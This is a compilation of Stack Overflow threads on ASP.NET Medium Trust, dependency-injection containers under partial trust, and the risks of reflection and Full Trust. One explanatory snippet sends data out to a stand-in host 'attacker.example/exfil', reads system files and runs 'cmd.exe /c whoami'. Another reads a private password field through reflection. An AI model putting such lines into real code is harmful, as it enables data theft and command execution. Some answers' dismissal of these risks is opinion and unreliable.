Is trying to develop for Medium Trust a lost cause? - asp.net

I started developing a new MVC app with Entity Framework code-first and Unity for dependency injection. I used EF5 and Unity because I thought they were supposed to work in Medium Trust. However, when I threw the <trust level="Medium" /> tag in my web.config, I started getting Reflection Permission exceptions.
It seems like whenever I go beyond built-in pieces like the System.Data.SqlClient ADO.NET classes, I run into problems in Medium Trust. AutoMapper: fail. NHibernate: fail. MySQL: fail. EF5 Code First: fail. IoC: fail.
Am I just chasing a pipe-dream? Is it possible to achieve a well-architected and testable web application using modern technology that will run in Medium Trust?
In the age of VMs/Virtual Servers/Cloud Computing (and even a few shared hosts that will set your application pools to Full Trust) has anyone found developing for Medium Trust to be worth the effort?

The official position of the ASP.NET team is that Medium Trust is obsolete. This means a few things:
We are automatically resolving all Medium Trust-related bugs reported to us as "won't fix".
We have provided guidance to hosters that they should migrate away from Medium Trust and use proper OS-level isolation instead (http://support.microsoft.com/kb/2698981).
We are removing Medium Trust support from the frameworks we develop (MVC, WebAPI, SignalR, and so on). Going forward, applications built on these frameworks will require Full Trust.
Here, the term "Medium Trust" refers to all non-Full Trust configurations in ASP.NET, including the built-in trust levels (Minimal, Low, Medium, High) and any custom trust levels.
Edit 26 May 2015: The .NET Framework as a whole has deprecated partial trust, and customers are advised not to rely on it as a security boundary. From MSDN:
Code Access Security in .NET Framework should not be used as a security boundary with partially trusted code, especially code of unknown origin. We advise against loading and executing code of unknown origins without putting alternative security measures in place.

In general, anything that relies heavily on Reflection can't run in Medium Trust.
In your case:
AutoMapper: uses reflection to discover matching properties and a memory stream to clone them (there is a version around that actually works in Medium Trust, with some limitations).
NHibernate: uses Reflection.Emit to enable lazy loading, because lazy loading in NH is implemented with proxies (to avoid this you can disable lazy loading, or use the NHibernate ProxyGenerator, a utility that helps you pre-create the proxies; see the mapping sketch after this list).
NHibernate ProxyGenerator
EF: Actually I didn't find big issues with EF and Medium Trust, as long as you don't serialize objects with associations or collections.
IoC: IoC is the killer application of reflection :) You can try Autofac, which works in Medium Trust.
Autofac
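If you go the disable-lazy-loading route instead of pre-generating proxies, a minimal Fluent NHibernate mapping could look like the sketch below (the Product and Category entities are made up for illustration):
// Sketch: turning off lazy loading per mapping so NHibernate never has to
// emit runtime proxies (the Reflection.Emit step that Medium Trust blocks).
// The Product/Category entities are hypothetical.
using FluentNHibernate.Mapping;

public class Category
{
    public virtual int Id { get; set; }
    public virtual string Name { get; set; }
}

public class Product
{
    public virtual int Id { get; set; }
    public virtual string Name { get; set; }
    public virtual Category Category { get; set; }
}

public class ProductMap : ClassMap<Product>
{
    public ProductMap()
    {
        Not.LazyLoad();                               // no proxy for the entity itself
        Id(x => x.Id);
        Map(x => x.Name);
        References(x => x.Category).Not.LazyLoad();   // eager-load the association
    }
}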
In general Medium Trust is a big limitation...but it all depends on what kind of project you are working on.
Also consider using a Full Trust host like Arvixe.
Hope this helps

Related

Moving from Castle Windsor to an IoC that runs under Medium Trust

I've inherited a project which was running on a host who had set up Full Trust, as this is required for the Castle Windsor IoC. The new host, however, will only run in Medium Trust (as do most shared hosting providers), so I need to replace Windsor with another IoC.
Being fairly new to IoC, I'm not sure which framework(s) are best to use under Medium Trust and with the Service Locator model.
An example of existing registration code is as follows:
IWindsorContainer container = new WindsorContainer();
ControllerBuilder.Current.SetControllerFactory(new WindsorControllerFactory(container));
container.RegisterControllers(typeof(HomeController).Assembly);

container.Register(
    Component.For(typeof(IEntityDuplicateChecker))
        .ImplementedBy(typeof(EntityDuplicateChecker))
        .Named("entityDuplicateChecker"));

container.Register(
    AllTypes
        .FromAssemblyNamed("Salient.Website.Data")
        .Pick()
        .WithService.FirstNonGenericCoreInterface("Salient.Website.Core"));

container.Register(
    AllTypes
        .FromThisAssembly()
        .Pick()
        .WithService.FirstNonGenericCoreInterface("Salient.Website.ApplicationServices"));

ServiceLocator.SetLocatorProvider(() => new WindsorServiceLocator(container));
It would save me a lot of trial and error with each framework if I had some guidance on which ones are suitable and work under Medium Trust shared hosting, and ideally an example of translating the above to get started.
The partial trust requirement of your hoster is odd, since Microsoft has provided guidance to hosters that they should migrate away from Medium Trust and use proper OS-level isolation instead (see here and here and here). The official position of the ASP.NET team is that Medium Trust is obsolete, which means that new features and frameworks won't be tested for partial trust support, and bugs in that area won't get fixed.
Nevertheless, there are other frameworks that will run in partial trust:
Simple Injector (which I maintain) is designed and tested for partial trust scenarios.
Ninject has special builds for medium trust environments.
There might be others, but these are the ones I know of.
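As a rough starting point, the Windsor registration from the question might translate to Simple Injector along these lines. This is only a sketch: it assumes the SimpleInjector and SimpleInjector.Integration.Web.Mvc NuGet packages, approximates Windsor's FirstNonGenericCoreInterface convention with a manual scan, and plugs into MVC's DependencyResolver (MVC 3+) instead of the Common Service Locator:
// Sketch of a Simple Injector equivalent of the Windsor registration above.
// Package names, the batch-registration loop and the DependencyResolver usage
// are assumptions -- adjust to your project.
using System.Linq;
using System.Reflection;
using System.Web.Mvc;
using SimpleInjector;
using SimpleInjector.Integration.Web.Mvc;

public static class Bootstrapper
{
    public static void Wire()
    {
        var container = new Container();

        // Replaces container.RegisterControllers(...) / WindsorControllerFactory.
        container.RegisterMvcControllers(typeof(HomeController).Assembly);

        // Replaces the named Component.For(typeof(IEntityDuplicateChecker)) registration
        // (Simple Injector has no named registrations; one per service type).
        container.Register<IEntityDuplicateChecker, EntityDuplicateChecker>();

        // Rough stand-in for AllTypes...FirstNonGenericCoreInterface(...):
        // register each concrete exported type in the data assembly by its
        // first interface. Windsor's convention is more selective than this.
        var dataAssembly = Assembly.Load("Salient.Website.Data");
        foreach (var type in dataAssembly.GetExportedTypes()
            .Where(t => t.IsClass && !t.IsAbstract && t.GetInterfaces().Any()))
        {
            container.Register(type.GetInterfaces().First(), type);
        }

        // Replaces ServiceLocator.SetLocatorProvider(...): let MVC resolve
        // controllers (and their dependencies) through the container.
        DependencyResolver.SetResolver(new SimpleInjectorDependencyResolver(container));
    }
}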

NHibernate 3.3.3 Medium Trust simple site not working out of the box

I have created a simple bare web site with NHibernate running under Medium Trust, and despite all the research I have done saying it should work, I cannot get the simplest of examples working. Here are my steps:
Create new web site in VS2012 targeting .Net 4.0.
Add FluentNHibernate via NuGet, along with the NHibernate.DependencyInjection package. This also installs NHibernate 3.3.3.
Configure web.config to run in Medium Trust.
Create a simple session factory, connect to an MSSQL database, and use CurrentSessionContext(typeof(ManagedWebSessionContext).FullName).
At this point, everyone seems to suggest all you have to do in Application_Start is call
NHibernate.DependencyInjection.Initializer.RegisterBytecodeProvider();
But when I do that I get the dreaded SecurityException demanding System.Security.Permissions.ReflectionPermission. Looking at the source of NHibernate.DependencyInjection, it appears ReflectionPermission needs to be granted for the injection piece to work. But Medium Trust explicitly withholds ReflectionPermission. If I skip the DependencyInjection piece and try to use NHibernate as-is (which some people suggest might just work), I still get the same SecurityExceptions.
So you see the catch-22 that I am in. It sounds like I need to use DependencyInjection to get Medium Trust to work, yet DependencyInjection requires permission that Medium Trust doesn't provide.
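For reference, the session factory from step 4 is built roughly like this (a sketch; ProductMap stands in for whatever mapping classes the real project uses):
// Rough sketch of the session factory described in step 4.
using FluentNHibernate.Cfg;
using FluentNHibernate.Cfg.Db;
using NHibernate;
using NHibernate.Context;

public static class SessionFactoryBuilder
{
    public static ISessionFactory Build(string connectionString)
    {
        return Fluently.Configure()
            .Database(MsSqlConfiguration.MsSql2008
                .ConnectionString(connectionString)
                // step 4: manage the session per web request
                .CurrentSessionContext(typeof(ManagedWebSessionContext).FullName))
            .Mappings(m => m.FluentMappings.AddFromAssemblyOf<ProductMap>())
            .BuildSessionFactory();
    }
}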
IIRC, NH3 will not run in a default Medium Trust environment.
It can run in customized "medium trust" configurations that some shared hosting providers use. You need to test with the specific policy you will be targeting.

Does NInject work in medium trust hosting?

I'm doing shared hosting with GoDaddy and I developed a sample ASP.NET MVC app using Castle Windsor and unfortunately, it didn't work in a medium trust setting. Specifically, I got this error: "[SecurityException: That assembly does not allow partially trusted callers"... etc. GoDaddy is sadly not flexible in their trust policy.
I'm not tied to Windsor and would like to try another container that will work under Medium Trust. I'd actually like to use NInject, but I've read reports of mixed success. The only one I've read works without problems is Microsoft's Unity.
My question is, does NInject work in medium trust? If not, what are my options?
Some DI frameworks use lightweight code generation and don't work in Medium Trust; NInject is one of them. You can set the UseReflectionBasedInjection switch to true, which makes it fall back to plain reflection instead of code generation; that is worth a try if performance is not an issue for you.
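For example, the switch is set when the kernel is created (a sketch, assuming a Ninject 2.x style NinjectSettings object):
// Sketch: disable Ninject's lightweight code generation so it falls back to
// plain reflection, which Medium Trust permits (assumes Ninject 2.x).
using Ninject;

public static class IoCConfig
{
    public static IKernel CreateKernel()
    {
        var settings = new NinjectSettings
        {
            UseReflectionBasedInjection = true   // avoid System.Reflection.Emit
        };
        return new StandardKernel(settings);
    }
}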
If you want Windsor working under partial trust, you currently have to build it from source with the AllowPartiallyTrustedCallersAttribute. The easiest way to do this is using Horn; see this thread.
Otherwise take a look at Unity or Autofac; I think they apply the APTCA by default.

What risk does Reflection pose? (Medium Trust)

The lack of reflection in Medium Trust hosting environments seems to cause a lot of problems for many popular web applications.
Why is ReflectionPermission disabled by default with Medium Trust?
What risk does reflection pose in a shared hosting environment?
For random reference, see MSDN: How to use Medium Trust in ASP.NET 2.0
Reflection allows malicious code to inspect all kinds of secrets: not so much intellectual property (though sure, that too), but data that should be private and secure, like connection strings, passwords, bank account data, etc.
Of course, many programs expose this data as a matter of course through even more-easily compromised vectors, but there's no reason to increase an application's attack surface.
Edited to bring some of the conversation up from the comments:
It's probably true that the real risk is unrestricted file system access, which is what turns reflection into a real danger. If a bad actor can get an assembly (or something that gets compiled into an assembly) into your virtual directory, you're in trouble if they have reflection permission. (Of course if this happens, there are other potential problems as well, but that shouldn't discount this particular vulnerability.)
In a shared hosting environment that's just harder to prevent, though it certainly isn't impossible. Perhaps it's worth cross-posting this question to ServerFault to see what the good folks there have to say.
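To make the risk concrete, this is the kind of thing ReflectionPermission unlocks (a contrived sketch; the class and field names are invented):
// Contrived sketch: with ReflectionPermission (MemberAccess), code can read
// private state in other assemblies. Medium Trust does not grant this, so the
// GetValue call below would fail with a SecurityException there.
using System;
using System.Reflection;

public class BillingComponent    // imagine this type ships in someone else's assembly
{
    private string connectionString = "Server=db;User Id=sa;Password=s3cret;";
}

public static class Snoop
{
    public static string ReadPrivateField(object target, string fieldName)
    {
        FieldInfo field = target.GetType().GetField(
            fieldName, BindingFlags.Instance | BindingFlags.NonPublic);
        return (string)field.GetValue(target);
    }

    public static void Main()
    {
        Console.WriteLine(ReadPrivateField(new BillingComponent(), "connectionString"));
    }
}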
I've never found anything 'bad' that a user would be able to do using reflection.
People get scared off because you're able to call methods that are marked as private or protected, but from what I've seen, none of that poses any real risk.
Most likely, it's at least in part a sales technique to get you to shell out for (semi-) dedicated hosting :)
I found the following MSDN article on this subject:
Security Considerations for Reflection
This article echoes Jeff's answer:
Reflection provides the ability to obtain information about types and members, and to access members. Accessing nonpublic members could create a security risk. Therefore, code that accesses nonpublic members requires ReflectionPermission with the appropriate flags.
However, I don't believe this risk can be exploited between customers' hosting accounts. It appears this would only pose a personal risk. For example, using reflection I could explore my own assemblies in my hosting environment. Other customers, however, could not use reflection to explore my assemblies; they could only explore their own.
This might pose a problem for a single web application that involves multiple development teams. One development team could use reflection to explore another development team's assemblies.
However, this is a rare scenario for a shared hosting environment. Most shared hosting web sites involve a very small team who have full access to all the code. In other words, there are no secrets. As long as the assembly is safe from other shared hosting customers, then it's not a problem.
Enabling reflection shouldn't pose any risk for most shared hosting web applications:
<IPermission class="ReflectionPermission" version="1" Flags="RestrictedMemberAccess"/>
Please correct me if I'm wrong.

ASP.NET - Trust Level = Full?

I recently joined a firm and when analyzing their environment I noticed that the SharePoint web.config had the trust level set to Full. I know this is an absolutely terrible practice and was hoping the stackoverflow community could help me outline the flaws in this decision.
Oh, it appears this decision was made to allow the developers to deploy dlls to the Bin folder without creating CAS policies. Sigh.
Just want to clarify and make matters worse, we are also deploying third party code to this web application.
Todd,
The book, "Programming Microsoft ASP.Net 3.5", by Dino Espisito provides some sound reasoning for not allowing Full Trust in ASP.Net applications.
Among other reasons, Dino states that web applications exposed to the internet are "one of the most hostile environments for computer security you can imagine." And:
a publicly exposed fully trusted application is a potential platform for hackers to launch attacks. The less an application is trusted, the more secure that application happens to be.
I'm surprised the StackOverflow community did not outline the problem with Full Trust better. I was hoping for the same thing so I didn't have to go digging through my pile of books to find the answer, lazy me.
If they're ignoring the CAS policies, it might be a tough sell to get them to dial it back, since it makes their job a little harder (or, at least, a little less forgiving). Changing security practices is always tough - like when I had to convince my boss that using the SA accounts in the SQL connection string of our web applications was a bad idea - but hang in there.
Full Trust allows the application to escalate to control of any resource on the computer. While you'd have to have a security flaw in your application to allow this, and they'll probably claim they've prevented any escalation through astute programming, remind them that if something does happen, wouldn't they rather the web application didn't have control of the whole computer? Just in case?
EDIT: I was a little overzealous with my language here. Full Trust would allow the application to control whatever it wants, but only if the Application Pool process has sufficient rights to do it. So if you're running as a limited user with no rights on the server beyond what the application needs, then I suppose there's essentially no risk to "Full Trust". The reality is that the app pool owner most likely has a number of rights you wouldn't want your app to have (and in some cases, many, many more), so it's much safer to limit app security and grant the additional rights the application needs individually. Thanks for the correction, Barry.
Flaws? Many. But the most damning thing is straight out of the CAS utility:
"...it allows full access to your computer's resources such as the file system or network access, potentially operating outside the control of the security system."
That means, code granted Full Trust can execute any other piece of code (managed or otherwise) on the system, can call across the network to any machine, can do anything in the file system (including changing permissions on restricted files - even OS files).
Most web programmers would say "that's not a problem, it's just my code," which is fine.... until a security flaw crops up in their code that allows an attacker to use it to do unsavoury things. Then previously-granted Full Trust becomes quite unfortunate.
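As a concrete illustration, code like the following runs unchallenged under Full Trust, while Medium Trust's default policy stops each call with a SecurityException (the paths and host name are made up):
// Things Full Trust permits that Medium Trust's default policy blocks:
// file access outside the application directory, arbitrary outbound HTTP,
// and launching external processes. Paths/hosts here are invented.
using System.Diagnostics;
using System.IO;
using System.Net;

public static class FullTrustOnly
{
    public static void Demo()
    {
        // FileIOPermission outside the web root: denied in Medium Trust.
        string hosts = File.ReadAllText(@"C:\Windows\System32\drivers\etc\hosts");

        // WebPermission to an arbitrary host: Medium Trust only allows the
        // address configured via originUrl, if any.
        using (var client = new WebClient())
        {
            client.DownloadString("http://attacker.example/exfil?len=" + hosts.Length);
        }

        // Spinning up external processes: requires Full Trust.
        Process.Start("cmd.exe", "/c whoami");
    }
}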
I honestly have found SharePoint to be too restrictive.
Take a look at the following page to see what can and cannot be done based on trust levels
http://msdn.microsoft.com/en-us/library/ms916855.aspx
One problem I ran into immediately was that I could not use the Caching Application Block. We were using this application block instead of ASP.NET caching because we had used an MVP pattern and might open up a WinForms application later.
Another problem is that reflection isn't allowed; this caused the About page to fail because the version number is pulled from the assembly's metadata.
I think the best solution is not to use SharePoint as an application host. I would only use SharePoint as an application host if the amount of coding was so small that it didn't affect the trust level and it would be less work than setting up a new application. If you are doing the kind of coding that starts to hit the walls of the trust level, move your application into a proper ASP.NET environment. But that is just me, and I am biased. Maybe you should aim for a Medium Trust compromise.
I use Full Trust on my development machines so I can deploy to the BIN folder when building new code.
I trust my own code and run it in the GAC on production because creating CAS policies is a pain.
The third-party thing would have me worried... however:
Most third-party solutions found on the web also deploy to the GAC (presumably for the same reasons). This gives them full rights regardless of the trust level.
It feels like it has more to do with whether you trust the third parties... and do you really trust your own developers?
What would a hacker do?
I don't see the scenario where a hacker drops an evil DLL into your BIN folder as very realistic... and if he can do that, he can probably change the trust level as well.
